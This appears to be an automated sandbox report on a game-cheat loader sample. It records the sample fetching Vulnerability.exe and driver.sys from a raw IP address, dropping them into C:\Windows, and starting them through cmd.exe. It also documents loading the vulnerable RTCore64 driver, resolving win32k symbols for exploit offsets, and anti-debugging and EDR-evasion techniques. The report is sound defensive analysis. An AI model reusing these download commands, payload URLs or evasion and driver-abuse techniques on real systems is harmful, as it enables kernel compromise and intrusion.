Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

PE file contains sections with non-standard names

Source: Iyto7FYCJO.exe	Static PE information: section name: _RDATA
Source: Iyto7FYCJO.exe	Static PE information: section name: .vmp0
Source: Iyto7FYCJO.exe	Static PE information: section name: .vmp1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Vulnerability.exe

Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys			Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys			Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C8A50008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C88ED9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C8A6000D value: E9 BB CB EB FF	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C891CBC0 value: E9 5A 34 14 00	Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A3036BA4 second address: 7FF7A3036BAD instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A300CFB8 second address: 7FF7A308E2DA instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 23360512h 0x00000008 call 00007F93C8DCC21Ch 0x0000000d inc ecx 0x0000000e push edi 0x0000000f jmp 00007F93C8E1CC87h 0x00000014 inc ecx 0x00000015 push ebx 0x00000016 pushfd 0x00000017 dec ecx 0x00000018 rcr ebx, cl 0x0000001a push eax 0x0000001b inc ecx 0x0000001c bt ebx, FFFFFFF4h 0x00000020 inc bp 0x00000022 bts ebx, ebp 0x00000025 inc ecx 0x00000026 push ebp 0x00000027 inc ecx 0x00000028 shr bl, cl 0x0000002a xchg al, ah 0x0000002c rcr ah, FFFFFF99h 0x0000002f inc ecx 0x00000030 push edx 0x00000031 inc bp 0x00000033 movsx ebx, cl 0x00000036 bswap eax 0x00000038 push ebx 0x00000039 inc esp 0x0000003a mov ebx, edi 0x0000003c push edx 0x0000003d inc sp 0x0000003f btr eax, esi 0x00000042 btc ax, FFE0h 0x00000047 inc cx 0x00000049 sar ebx, 6Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e inc ecx 0x0000004f xor bl, FFFFFFB7h 0x00000052 push ebp 0x00000053 inc eax 0x00000054 rol ch, 00000007h 0x00000057 push ecx 0x00000058 dec ebp 0x00000059 test edi, ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d bsf di, sp 0x00000061 inc ebp 0x00000062 cmp ch, ch 0x00000064 inc ecx 0x00000065 shr bl, cl 0x00000067 inc ecx 0x00000068 push eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A2B4D305 second address: 7FF7A2B4D335 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 00000043h 0x00000005 inc ecx 0x00000006 pop edx 0x00000007 inc cx 0x00000009 bt ebx, ecx 0x0000000c inc ecx 0x0000000d pop ebx 0x0000000e sal bl, cl 0x00000010 pop ebp 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 and esp, 7E967785h 0x0000001c dec esp 0x0000001d test edx, esp 0x0000001f inc ecx 0x00000020 pop ebp 0x00000021 inc cx 0x00000023 xor eax, 5C410F04h 0x00000029 dec eax 0x0000002a bt eax, 0Fh 0x0000002e cbw 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A2B613F1 second address: 7FF7A2B613FA instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Special instruction interceptor: First address: 7FF7A300CFA0 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Special instruction interceptor: First address: 7FF7A300CFB8 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys			Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Dropped PE file which has not been started: C:\Windows\driver.sys			Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Vulnerability.exe

API coverage: 7.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\timeout.exe TID: 2300

Thread sleep count: 38 > 30

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Vulnerability.exe

5_2_00007FF7738F3B60

Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@SH
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfonsjX

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Handle closed: DEADC0DE

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process queried: DebugObjectHandle			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00007FF7738F4B58

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F1630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F4D00 SetUnhandledExceptionFilter,	5_2_00007FF7738F4D00
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F43B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF7738F43B8
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF7738F4B58

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

NtProtectVirtualMemory: Indirect: 0x7FF7A2B8EF62

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Vulnerability.exe

Code function: GetLocaleInfoEx,FormatMessageA,

5_2_00007FF7738F38A8

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F4D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00007FF7738F4D6C

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.72.57	keyauth.win	United States		13335	CLOUDFLARENETUS	false
185.101.104.122	unknown	Romania		57673	HOSTCLEAN-SRLRO	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
keyauth.win	172.67.72.57	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.101.104.122/Vulnerability.exe	false		unknown
http://185.101.104.122/driver.sys	false		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Iyto7FYCJO.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	ReversingLabs: Detection: 55%
Source: C:\Windows\Vulnerability.exe	ReversingLabs: Detection: 55%
Source: C:\Windows\driver.sys	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: Iyto7FYCJO.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Iyto7FYCJO.exe

Joe Sandbox ML: detected

Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d1808002-5

Exploits

Accesses win32k, likely to find offsets for exploits

Source: C:\Windows\Vulnerability.exe

File opened: C:\Windows\System32\win32k.sys

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: Iyto7FYCJO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source:	Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Vulnerability.exe

5_2_00007FF7738F3B60

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 